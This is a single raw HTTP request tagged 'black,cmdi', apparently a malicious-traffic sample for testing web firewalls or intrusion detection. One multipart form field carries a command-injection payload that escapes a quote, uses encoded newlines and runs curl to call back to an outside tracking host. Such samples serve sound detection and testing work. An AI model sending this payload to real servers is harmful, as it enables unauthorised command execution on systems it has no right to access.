# tag: black,cmdi
# Request
GET / HTTP/1.1
Host: 100.0.0.103:9999
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_5_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Content-Length: 193
Content-Type: multipart/form-data; boundary=c73b32601324b2a8e4eebd01a1d5b695

--c73b32601324b2a8e4eebd01a1d5b695
Content-Disposition: form-data; name="bex49"

1'%0acurl tst2.qq.com/cmd_inject/823236292a2e2d09f9b971fc57512c7d%0a'
--c73b32601324b2a8e4eebd01a1d5b695--
